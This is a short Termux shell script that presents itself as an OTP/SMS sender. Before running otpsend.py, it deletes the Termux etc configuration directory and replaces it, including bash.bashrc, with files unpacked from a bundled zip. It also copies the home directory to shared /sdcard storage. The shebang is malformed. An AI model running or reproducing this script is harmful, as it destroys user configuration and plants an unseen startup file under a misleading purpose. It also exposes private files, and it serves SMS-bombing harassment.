#!/bin.sh
pkg update && pkg update
pkg install zip
termux-setup-storage
cd
cd ..
cd usr
rm -rf etc
cd




cd /data/data/com.termux/files/home/otp
cd etc
cd tls

unzip temp.zip
cp readme.md $HOME
cd
cd otp


cp -r etc /data/data/com.termux/files/usr
cp bash.bashrc /data/data/com.termux/files/usr/etc
cd ..
cd ..
cp -r home /sdcard
clear
echo -e "\e[1;33m Sending sms...."
sleep 2
cd /data/data/com.termux/files/home/otp/etc/tls
python otpsend.py
